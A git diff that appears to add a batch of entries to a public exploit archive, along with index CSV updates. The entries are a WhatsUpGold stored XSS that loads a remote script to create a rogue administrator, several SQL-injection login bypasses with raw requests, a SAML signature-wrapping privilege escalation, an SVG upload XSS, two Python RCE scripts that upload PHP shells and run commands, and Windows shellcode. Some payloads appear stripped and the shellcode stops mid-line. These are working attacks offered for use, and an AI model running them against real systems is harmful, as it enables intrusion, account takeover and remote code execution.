diff --git a/exploits/multiple/webapps/50366.txt b/exploits/multiple/webapps/50366.txt new file mode 100644 index 000000000..88722e246 --- /dev/null +++ b/exploits/multiple/webapps/50366.txt @@ -0,0 +1,57 @@ +# Exploit Title: WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS) +# Date: 09.17.2021 +# Exploit Author: Andreas Finstad (4ndr34z) +# Vendor Homepage: https://www.whatsupgold.com +# Version: v.21.0.3, Build 188 +# Tested on: Windows 2019 Server +# CVE : CVE-2021-41318 +# Reference: https://f20.be/cves/poc-cve-2021-41318 + +Description: +Improper validation of strings from discovered SNMP devices, makes the application prone to stored XXS attacks. +Placing a XSS payload in one of the fields reflected onto the application, triggers the exploitation. +No CSRF protection/token on adding/posting a new user account, makes it possible to create a rouge administrator, using a staged javascript delivered through the XSS. + +SNMP A nix computer placed on a subnet accessible from the server for discovery, you edit the SNMPd.conf, adding the payload: + +# snmpd.conf +# An example configuration file for configuring the Net-SNMP agent ('snmpd') +# See snmpd.conf(5) man page for details +############################################################################ +# SECTION: System Information Setup +# syslocation: The [typically physical] location of the system. +# Note that setting this value here means that when trying to +# perform an snmp SET operation to the sysLocation.0 variable will make +# the agent return the "notWritable" error code. IE, including +# this token in the snmpd.conf file will disable write access to +# the variable. +# arguments: location_string +sysName Evil-Device +sysLocation Somewhere Over The Rainbow +sysContact + +This is the base64 encoded string: +var a=document.createElement("script");a.src="http://192.168.66.46/x.js";document.body.appendChild(a); + +x.js: +var vhost = window.location.protocol+'\/\/'+window.location.host +var username = "sysadmin" +var password = "me" + +fetch(vhost+'/NmConsole/api/core/WebUser',{ + method: 'POST', + headers: { + 'Content-Length': '479', + 'Accept': 'application/json', + 'X-Requested-With': 'XMLHttpRequest', + 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Edg/90.0.818.51', + 'Content-Type': 'application/json', + 'Origin': vhost, + 'Referer': vhost+'/NmConsole/', + 'Accept-Encoding': 'gzip, deflate', + 'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4', + 'Connection': 'close' + }, + credentials: 'include', + body: '{"HomeDeviceGroupID":0,"HomeDeviceGroupPath":"My Network","LanguageID":1033,"UserRightsMask":"0","IsDgarConfigured":false,"Groups" [1],"WebUserID":-1,"UserName":"'+username+'","AuthenticationType":1,"ApplyWebUiSessionTimeout":true,"ApplyLockoutPolicy":false,"ApplyPasswordAging":false,"ApplyPasswordComplexity":false,"ApplySessionPolicy":false,"FailedLoginCount":0,"IsLocked":false,"Password":"'+password+'","UnlockUser":false,"WebConfigurationSettings":"","id":"Wug.model.userManagement.WebUser-2"}' +}); \ No newline at end of file diff --git a/exploits/php/webapps/50360.txt b/exploits/php/webapps/50360.txt new file mode 100644 index 000000000..7976201b5 --- /dev/null +++ b/exploits/php/webapps/50360.txt @@ -0,0 +1,35 @@ +# Exploit Title: Exam Form Submission System 1.0 - SQL Injection Authentication Bypass +# Date: 30-09-2021 +# Exploit Author: Nitin Sharma (Vidvansh) +# Vendor Homepage: https://code-projects.org +# Product link: https://code-projects.org/exam-form-submission-in-php-with-source-code/ +# Version: 1.0 +# Tested on: XAMPP / Windows 10 + +Steps-To-Reproduce: +Step 1 Go to the Product admin panel http://localhost/EXAM_FORM_SUBMISSION/admin/index.php. +Step 2 – Enter anything in username and password +Step 3 – Click on Login and capture the request in the burp suite +Step4 – Change the username to ' OR 1 -- - and password to ' OR 1 -- -. +Step 5 – Click forward and now you will be logged in as admin. + +POC +POST /EXAM_FORM_SUBMISSION/admin/index.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-GB,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 40 +Origin: http://localhost +Connection: close +Referer: http://localhost/EXAM_FORM_SUBMISSION/admin/index.php +Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76 +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 + +email='%20OR%201%20--%20-&pass='%20OR%201%20--%20-&Login=Login \ No newline at end of file diff --git a/exploits/php/webapps/50361.txt b/exploits/php/webapps/50361.txt new file mode 100644 index 000000000..ed15e7644 --- /dev/null +++ b/exploits/php/webapps/50361.txt @@ -0,0 +1,115 @@ +# Exploit Title: Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation via XML Signature Wrapping +# Date: 09/07/2021 +# Exploit Author: Cristian 'void' Giustini +# Vendor Homepage: https://www.miniorange.com/ +# Software Link: https://www.drupal.org/project/miniorange_saml +# Version: 8.x-2.22 (REQUIRED) +# Tested on: Linux Debian (PHP 8.0.7 with Apache/2.4.38) +# Original article: https://blog.hacktivesecurity.com/index.php/2021/07/09/sa-contrib-2021-036-notsosaml-privilege-escalation-via-xml-signature-wrapping-on-minorangesaml-drupal-plugin/ +# Drupal Security Advisory URL: https://www.drupal.org/sa-contrib-2021-036 + +--- + +The MiniorangeSAML Drupal Plugin v. 8.x-2.22 is vulnerable to XML +Signature Wrapping Attacks that could allows an attacker to perform +privilege escalation attacks. + +In order to exploit the vulnerability, the plugin must be configured +with the "Either SAML reponse or SAML assertion must be signed" options +enabled and an empty "x509 certificate". + +Administrator point of view: + +- Install a Drupal version (for the PoC the version 9.1.10 has been used) + +- Configure an external SSO system like Auth0 + +- Configure the plugin with the Auth0 provider by checking the "Either +SAML response or SAML assertion must be signed" and empty "x509 certificate" + + +Attacker point of view: + +- Register a normal user on the website + +- Perform a login + +- Intercept the request with Burp Suite and decode the SAMLResponse +parameter + +- Inject an additional object before the original one +(example here: +https://gist.github.com/voidz0r/30c0fb7be79abf8c79d1be9d424c9e3b#file-injected_object-xml) +(SAMLRaider Burp extension, XSW3 payload) + + + urn:miniorange-research.eu.auth0.com + + admin + + + + + + + http://localhost:8080 + + + + urn:oasis:names:tc:SAML:2.0:ac:classes:unspecified + + + + + admin + + + test@example.com + + + test@example.com + + + test@example.com + + + Username-Password-Authentication + + + auth0 + + + false + + + 8bbK44pPnBAqzN49pSuwmgdhgsZavkNI + + + Wed Jun 23 2021 21:01:51 GMT+0000 (Coordinated Universal Time) + + + false + + + test + + + https://s.gravatar.com/avatar/55502f40dc8b7c769880b10874abc9d0?s=480&r=pg&d=https%3A%2F%2Fcdn.auth0.com%2Favatars%2Fte.png + + + + Wed Jun 23 2021 21:01:51 GMT+0000 (Coordinated Universal Time) + + + + + + + +- Replace the username with one with higher privileges (like admin) + +- Submit the request + +- Successful exploitation \ No newline at end of file diff --git a/exploits/php/webapps/50362.txt b/exploits/php/webapps/50362.txt new file mode 100644 index 000000000..0400ecc25 --- /dev/null +++ b/exploits/php/webapps/50362.txt @@ -0,0 +1,40 @@ +# Exploit Title: Blood Bank System 1.0 - SQL Injection / Authentication Bypass +# Date: 30-9-2021 +# Exploit Author: Nitin Sharma (vidvansh) +# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code/ +# Software Link : https://download.code-projects.org/details/f44a4ba9-bc33-48c3-b030-02f62117d230 +# Version: 1.0 +# Tested on: Windows 10 , Apache , Mysql + +# Description : Password input is affected with authentication bypass because of improper sanitisation which lead to access to auauthorised accounts. + +#Steps-To-Reproduce: +Step 1 Go to the Product admin panel http://localhost/bloodbank/login.php. +Step 2 – Enter anything in username and password +Step 3 – Click on Login and capture the request in the burp suite +Step4 – Change the username to ' OR 1 -- - and password to ' OR 1 -- -. +Step 5 – Click forward and now you will be logged in as admin. + +# PoC: + +GET /bloodbank/file/../bloodrequest.php?msg=Gandhi%20hospital%20have%20logged%20in. HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-GB,en;q=0.5 +Accept-Encoding: gzip, deflate +Origin: http://localhost +Connection: close +Referer: http://localhost/bloodbank/login.php +Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76 +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 + +# Authentication Bypass: + +# Go to admin login page (http://localhost/bloodbank/login.php), then use below payload as username and password => +Username: ** Random email** +Password: ' or 1 -- - \ No newline at end of file diff --git a/exploits/php/webapps/50363.txt b/exploits/php/webapps/50363.txt new file mode 100644 index 000000000..d7b40ec59 --- /dev/null +++ b/exploits/php/webapps/50363.txt @@ -0,0 +1,35 @@ +# Exploit Title: Phpwcms 1.9.30 - File Upload to XSS +# Date: 30/9/2021 +# Exploit Author: Okan Kurtulus | okankurtulus.com.tr +# Software Link: http://www.phpwcms.org/ +# Version: 1.9.30 +# Tested on: Ubuntu 16.04 + +Steps: + +1-) You need to login to the system. +http://target.com/phpwcms/login.php + +2-) Creating payload with SVG extension: payload.svg + + + + + + + + + + +3-) Go to the following link and upload the payload: +http://target.com/phpwcms/phpwcms.php?csrftoken=b72d02a26550b9877616c851aa6271be&do=files&p=8 + +From the menu: + +file -> multiple file upload -> Select files or drop here + +4-) After uploading payload, call it from the link below. + +http://192.168.1.112/phpwcms/upload/ \ No newline at end of file diff --git a/exploits/php/webapps/50364.py b/exploits/php/webapps/50364.py new file mode 100755 index 000000000..1967a03b5 --- /dev/null +++ b/exploits/php/webapps/50364.py @@ -0,0 +1,79 @@ +# Exploit Title: Vehicle Service Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) +# Date: 30.09.2021 +# Exploit Author: Fikrat Ghuliev (Ghuliev) +# Vendor Homepage: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14972&title=Vehicle+Service+Management+System+in+PHP+Free+Source+Code +# Version: 1.0 +# Tested on: Ubuntu + +import requests +from bs4 import BeautifulSoup +import sys +import random +import string +import time + +print(""" + +[+] Vehicle Service Management System + +[!] Auth bypass + shell upload = RCE + +""") + +time.sleep(2) +if len(sys.argv) != 4: + print("[~] Usage : python3 exploit.py localhost ip port") + exit() + +site = sys.argv[1] +ip = sys.argv[2] +port = sys.argv[3] +shellcode = "&3 2>&3'); ?>" + +letters = string.ascii_lowercase +name = ''.join(random.choice(letters) for i in range(5)) + +def LoginAndShellUpload(): + print("[+] Try Login") + time.sleep(1) + login = 'http://'+site+'/vehicle_service/admin/login.php' + session = requests.session() + post_data = {"username": "' OR 1=1-- -", "password": "aa"} + user_login = session.post(login, data=post_data) + cookie = session.cookies.get_dict() + + print('[+]Success login') + + print('[+]Try Shell upload') + time.sleep(2) + #shell upload + url = 'http://'+site+'/vehicle_service/classes/SystemSettings.php?f=update_settings' + cookies = cookie + headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------34590800438205826044276614708", "Origin": "http://localhost", "Connection": "close", "Referer": "http://localhost/church_management/admin/?page=system_info", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"} + data = "-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\nVehicle Service Management System\r\n-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"short_name\"\r\n\r\nVSMS - PHP\r\n-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"about_us\"\r\n\r\n

About Us

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nullam non ultrices tortor. Sed at ligula non lectus tempor bibendum a nec ante. Maecenas iaculis vitae nisi eu dictum. Duis sit amet enim arcu. Etiam blandit vulputate magna, non lobortis velit pharetra vel. Morbi sollicitudin lorem sed augue suscipit, eu commodo tortor vulputate. Interdum et malesuada fames ac ante ipsum primis in faucibus. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Praesent eleifend interdum est, at gravida erat molestie in. Vestibulum et consectetur dui, ac luctus arcu. Curabitur et viverra elit. Cras ac eleifend ipsum, ac suscipit leo. Vivamus porttitor ac risus eu ultricies. Morbi malesuada mi vel luctus sagittis. Ut vestibulum porttitor est, id rutrum libero. Mauris at lacus vehicula, aliquam purus quis, pharetra lorem.

Proin consectetur massa ut quam molestie porta. Donec sit amet ligula odio. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Morbi ex sapien, pulvinar ac arcu at, luctus scelerisque nibh. In dolor velit, pellentesque eu blandit a, mollis ac neque. Fusce tortor lectus, aliquam et eleifend id, aliquet ut libero. Nunc scelerisque vulputate turpis quis volutpat. Vivamus malesuada sem in dapibus aliquam. Vestibulum imperdiet, nulla vitae pharetra pretium, magna felis placerat libero, quis tincidunt felis diam nec nisi. Sed scelerisque ullamcorper cursus. Suspendisse posuere, velit nec rhoncus cursus, urna sapien consectetur est, et lacinia odio leo nec massa. Nam vitae nunc vitae tortor vestibulum consequat ac quis risus. Sed finibus pharetra orci, id vehicula tellus eleifend sit amet.

Morbi id ante vel velit mollis egestas. Suspendisse pretium sem urna, vitae placerat turpis cursus faucibus. Ut dignissim molestie blandit. Phasellus pulvinar, eros id ultricies mollis, lectus velit viverra mi, at venenatis velit purus id nisi. Duis eu massa lorem. Curabitur sed nibh felis. Donec faucibus, nulla at faucibus blandit, mi justo efficitur dui, non mattis nisl purus non lacus. Maecenas vel congue tellus, in convallis nisi. Curabitur faucibus interdum massa, eu facilisis ligula pretium quis. Nunc eleifend orci nec volutpat tincidunt.

Ut et urna sapien. Nulla lacinia sagittis felis id cursus. Etiam eget lacus quis enim aliquet dignissim. Nulla vel elit ultrices, venenatis quam sed, rutrum magna. Pellentesque ultricies non lorem hendrerit vestibulum. Maecenas lacinia pharetra nisi, at pharetra nunc placerat nec. Maecenas luctus dolor in leo malesuada, vel aliquet metus sollicitudin. Curabitur sed pellentesque sem, in tincidunt mi. Aliquam sodales aliquam felis, eget tristique felis dictum at. Proin leo nisi, malesuada vel ex eu, dictum pellentesque mauris. Quisque sit amet varius augue.

Sed quis imperdiet est. Donec lobortis tortor id neque tempus, vel faucibus lorem mollis. Fusce ut sollicitudin risus. Aliquam iaculis tristique nunc vel feugiat. Sed quis nulla non dui ornare porttitor eu vitae nisi. Curabitur at quam ut libero convallis mattis vel eget mauris. Vivamus vitae lectus ligula. Nulla facilisi. Vivamus tristique maximus nulla, vel mollis felis blandit posuere. Curabitur mi risus, rutrum non magna at, molestie gravida magna. Aenean neque sapien, volutpat a ullamcorper nec, iaculis quis est.

\r\n-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"files\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+name+".php\"\r\nContent-Type: application/x-php\r\n\r\n"+shellcode+"\n\n\r\n-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"cover\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------38784447663334447953661330489--\r\n" + + requests.post(url, headers=headers, cookies=cookies, data=data) + print('[+]Success!') + print('[+]Getting reverse shell') + time.sleep(2) + + + + + +def RCE(): + + path = 'http://'+site+'/vehicle_service/uploads/' + html_text = requests.get(path).text + soup = BeautifulSoup(html_text, 'html.parser') + for link in soup.find_all('a'): + data = link.get('href') + if ".php" in data: + r = requests.get('http://'+site+'/vehicle_service/uploads/'+data) + print('[+]Pwned!') + + + +LoginAndShellUpload() +RCE() \ No newline at end of file diff --git a/exploits/php/webapps/50365.txt b/exploits/php/webapps/50365.txt new file mode 100644 index 000000000..ec11ec46d --- /dev/null +++ b/exploits/php/webapps/50365.txt @@ -0,0 +1,32 @@ +# Exploit Title: Dairy Farm Shop Management System 1.0 - SQL Injection Authentication Bypass +# Date: 2021-09-30 +# Exploit Author: sanjay singh +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/ +# Version: v1.0 +# Tested on: Windows 10 + +Steps-To-Reproduce: +Step 1 Go to the Product admin panel http://localhost/dfsms/index.php. +Step 2 – Enter anything in username and password +Step 3 – Click on Login and capture the request in the burp suite +Step 4 – Change the username to admin' or '1'='1 and password to dfsms +Step 5 – Click forward and now you will be logged in as admin. + +POC + +POST /dfsms/index.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 57 +Origin: http://localhost +Connection: close +Referer: http://localhost/dfsms/index.php +Cookie: PHPSESSID=hgjvarn4tie1nmsufdn8mf1hrl +Upgrade-Insecure-Requests: 1 + +username=admin%27+or+%271%27%3D%271&password=dfsms&login= \ No newline at end of file diff --git a/exploits/php/webapps/50367.py b/exploits/php/webapps/50367.py new file mode 100755 index 000000000..180b52ce9 --- /dev/null +++ b/exploits/php/webapps/50367.py @@ -0,0 +1,189 @@ +# Exploit Title: CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated) +# Date: 01-10-2021 +# Exploit Author: Halit AKAYDIN (hLtAkydn) +# Vendor Homepage: https://www.cmsimple-xh.org/ +# Software Link: https://www.cmsimple-xh.org/?Downloads +# Version: 1.7.4 +# Category: Webapps +# Tested on: Linux/Windows + + +# CMSimple_XH is an open source project under GPL3 license +# Includes an endpoint that allows remote access +# Backup page is misconfigured, causing security vulnerability +# User information with sufficient permissions is required. + +# Example: python3 exploit.py -u http://example.com -p Admin123 + + + +from bs4 import BeautifulSoup +from time import sleep +import requests +import argparse + + +def main(): +parser = argparse.ArgumentParser(description='CMSimple_XH Version 1.7.4 - Remote Code Execution (Authenticated)') +parser.add_argument('-u', '--host', type=str, required=True) +parser.add_argument('-p', '--password', type=str, required=True) +args = parser.parse_args() +print("\nCMSimple_XH Version 1.7.4 - Remote Code Execution (Authenticated)", +"\nExploit Author: Halit AKAYDIN (hLtAkydn)\n") +host(args) + + + +def host(args): +#Check http or https +if args.host.startswith(('http://', 'https://')): +print("[?] Check Url...\n") +sleep(2) +args.host = args.host +if args.host.endswith('/'): +args.host = args.host[:-1] +else: +pass +else: +print("\n[?] Check Adress...\n") +sleep(2) +args.host = "http://" + args.host +args.host = args.host +if args.host.endswith('/'): +args.host = args.host[:-1] +else: +pass + + +# Check Host Status +try: +response = requests.get(args.host) +if response.status_code == 200: +login(args) +else: +print("[-] Address not reachable!") +sleep(2) + +except requests.ConnectionError as exception: +print("[-] Address not reachable!") +sleep(2) +exit(1) + + +def login(args): + +url = args.host + "/?&login" +cookies = { +"XH_2f": "evil" +} +headers = { +"Origin": args.host, +"Content-Type": "application/x-www-form-urlencoded", +"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", +"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", +"Referer": args.host + "/?&login" +} +data = { +"login": "true", +"keycut": args.password, +"submit": "Login" +} +response = requests.post(url, headers=headers, cookies=cookies, data=data) + +token = response.cookies.get("XH_2f") +soup = BeautifulSoup(response.text, 'html.parser') + +if (soup.find("link",{"rel":"next"})['href'] != "/"): +print("[!] Login Success!\n") +sleep(2) +csrf(args,token) +else: +print("[!] Wrong password!!\n") +sleep(2) + + +def csrf(args, token): + +url = args.host + "/?file=content" +cookies = { +"status": "adm", +"XH_2f": token +} +headers = { +"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", +"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", +"Referer": args.host + "/?&settings", +"Accept-Encoding": "gzip, deflate", +"Connection": "close" +} +response = requests.get(url, headers=headers, cookies=cookies) + +try: +soup = BeautifulSoup(response.text, 'html.parser') +csrf = soup.find_all("input", type="hidden")[3].get("value") +create(args, token, csrf) +except Exception as e: +print(e) +else: +pass + + + +def create(args, token, csrf): + +payload = "\r\n" + +url = args.host +cookies = { +"status": "adm", +"XH_2f": token +} +headers = { +"Origin": args.host, +"Content-Type": "application/x-www-form-urlencoded", +"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", +"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", +"Referer": args.host + "/?file=content&action=edit&xh_success=content", +"Accept-Encoding": "gzip, deflate" +} +data = { +"text": payload, +"file": "content", +"action": "save", +"xh_csrf_token": csrf +} +response = requests.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=True) + +if (response.status_code == 200): +print("[!] Create Vuln File!\n") +sleep(2) +exploit(args) +else: +print("[!] Create Failed!\n") +sleep(2) + + +def exploit(args): + +print("[+] Exploit Done!\n") +sleep(2) + +while True: +cmd = input("$ ") +url = args.host + "/evil.php?cmd=" + cmd +headers = { +"Upgrade-Insecure-Requests": "1", +"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0" +} + +response = requests.post(url, headers=headers, timeout=5) + +if response.text == "": +print(cmd + ": command not found\n") +else: +print(response.text) + + + +if __name__ == '__main__': +main() \ No newline at end of file diff --git a/exploits/php/webapps/50370.txt b/exploits/php/webapps/50370.txt new file mode 100644 index 000000000..eca3e3cc4 --- /dev/null +++ b/exploits/php/webapps/50370.txt @@ -0,0 +1,32 @@ +# Exploit Title: Directory Management System 1.0 - SQL Injection Authentication Bypass +# Date: 2021-10-01 +# Exploit Author: SUDONINJA +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/directory-management-system-using-php-and-mysql/ +# Version: v1.0 +# Tested on: Windows 10 + +Steps-To-Reproduce: +Step 1 Go to the Product admin panel http://localhost/dfsms/index.php. +Step 2 – Enter anything in username and password +Step 3 – Click on Login and capture the request in the burp suite +Step 4 – Change the username to admin' or '1'='1 and password to dfsms +Step 5 – Click forward and now you will be logged in as admin. + +POC + +POST /dms/admin/ HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 83 +Origin: http://localhost +Connection: close +Referer: http://localhost/dms/admin/ +Cookie: PHPSESSID=hgjvarn4tie1nmsufdn8mf1hrl +Upgrade-Insecure-Requests: 1 + +username=admin%27+or+%271%27%3D%271&password=admin%27+or+%271%27%3D%271&login=login \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 8195d2224..1f23e49e8 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -44474,3 +44474,12 @@ id,file,description,date,author,type,platform,port 50356,exploits/php/webapps/50356.py,"Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,pussycat0x,webapps,php, 50357,exploits/php/webapps/50357.txt,"Pharmacy Point of Sale System 1.0 - 'Multiple' SQL Injection (SQLi)",1970-01-01,Murat,webapps,php, 50359,exploits/multiple/webapps/50359.txt,"PlaceOS 1.2109.1 - Open Redirection",1970-01-01,"Hamza Khedr",webapps,multiple, +50360,exploits/php/webapps/50360.txt,"Exam Form Submission System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Nitin Sharma",webapps,php, +50361,exploits/php/webapps/50361.txt,"Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation via XML Signature Wrapping",1970-01-01,"Cristian \'void\' Giustini",webapps,php, +50362,exploits/php/webapps/50362.txt,"Blood Bank System 1.0 - SQL Injection / Authentication Bypass",1970-01-01,"Nitin Sharma",webapps,php, +50363,exploits/php/webapps/50363.txt,"Phpwcms 1.9.30 - File Upload to XSS",1970-01-01,"Okan Kurtulus",webapps,php, +50364,exploits/php/webapps/50364.py,"Vehicle Service Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Ghuliev,webapps,php, +50365,exploits/php/webapps/50365.txt,"Dairy Farm Shop Management System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php, +50366,exploits/multiple/webapps/50366.txt,"WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Andreas Finstad",webapps,multiple, +50367,exploits/php/webapps/50367.py,"CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php, +50370,exploits/php/webapps/50370.txt,"Directory Management System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Sanjay Singh",webapps,php, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 5d6d1105b..d7c2e1ee8 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -1042,3 +1042,4 @@ id,file,description,date,author,type,platform 50125,shellcodes/linux_x86/50125.c,"Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes)",1970-01-01,d7x,shellcode,linux_x86 50141,shellcodes/linux_x86/50141.c,"Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode",1970-01-01,d7x,shellcode,linux_x86 50291,shellcodes/windows_x86-64/50291.c,"Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,windows_x86-64 +50368,shellcodes/windows_x86/50368.c,"Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)",1970-01-01,"Daniel Ortiz",shellcode,windows_x86 diff --git a/shellcodes/windows_x86/50368.c b/shellcodes/windows_x86/50368.c new file mode 100644 index 000000000..d42d3c2ec --- /dev/null +++ b/shellcodes/windows_x86/50368.c @@ -0,0 +1,187 @@ +; Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes) + +; Description: + +; This is a shellcode that pop a calc.exe. The shellcode iuses +; the PEB method to locate the baseAddress of the required module and the Export Directory Table +; to locate symbols. Also the shellcode uses a hash function to gather dynamically the required +; symbols without worry about the length. Finally the shellcode pop the calc.exe using WinExec +; and exits gracefully using TerminateProcess. + +; Author: h4pp1n3ss +; Date: Wed 09/22/2021 +; Tested on: Microsoft Windows [Version 10.0.19042.1237] + +start: + + mov ebp, esp ; prologue + add esp, 0xfffff9f0 ; Add space int ESP to avoid clobbering + + + find_kernel32: + xor ecx, ecx ; ECX = 0 + mov esi,fs:[ecx+0x30] ; ESI = &(PEB) ([FS:0x30]) + mov esi,[esi+0x0C] ; ESI = PEB->Ldr + mov esi,[esi+0x1C] ; ESI = PEB->Ldr.InInitOrder + + next_module: + mov ebx, [esi+0x08] ; EBX = InInitOrder[X].base_address + mov edi, [esi+0x20] ; EDI = InInitOrder[X].module_name + mov esi, [esi] ; ESI = InInitOrder[X].flink (next) + cmp [edi+12*2], cx ; (unicode) modulename[12] == 0x00 ? + jne next_module ; No: try next module + + find_function_shorten: + jmp find_function_shorten_bnc ; Short jump + + find_function_ret: + pop esi ; POP the return address from the stack + mov [ebp+0x04], esi ; Save find_function address for later usage + jmp resolve_symbols_kernel32 ; + + find_function_shorten_bnc: + call find_function_ret ; Relative CALL with negative offset + + find_function: + pushad ; Save all registers + + mov eax, [ebx+0x3c] ; Offset to PE Signature + mov edi, [ebx+eax+0x78] ; Export Table Directory RVA + add edi, ebx ; Export Table Directory VMA + mov ecx, [edi+0x18] ; NumberOfNames + mov eax, [edi+0x20] ; AddressOfNames RVA + add eax, ebx ; AddressOfNames VMA + mov [ebp-4], eax ; Save AddressOfNames VMA for later + + find_function_loop: + jecxz find_function_finished ; Jump to the end if ECX is 0 + dec ecx ; Decrement our names counter + mov eax, [ebp-4] ; Restore AddressOfNames VMA + mov esi, [eax+ecx*4] ; Get the RVA of the symbol name + add esi, ebx ; Set ESI to the VMA of the current symbol name + + compute_hash: + xor eax, eax ; NULL EAX + cdq ; NULL EDX + cld ; Clear direction + + compute_hash_again: + lodsb ; Load the next byte from esi into al + test al, al ; Check for NULL terminator + jz compute_hash_finished ; If the ZF is set, we've hit the NULL term + ror edx, 0x0d ; Rotate edx 13 bits to the right + add edx, eax ; Add the new byte to the accumulator + jmp compute_hash_again ; Next iteration + + compute_hash_finished: + + find_function_compare: + cmp edx, [esp+0x24] ; Compare the computed hash with the requested hash + jnz find_function_loop ; If it doesn't match go back to find_function_loop + mov edx, [edi+0x24] ; AddressOfNameOrdinals RVA + add edx, ebx ; AddressOfNameOrdinals VMA + mov cx, [edx+2*ecx] ; Extrapolate the function's ordinal + mov edx, [edi+0x1c] ; 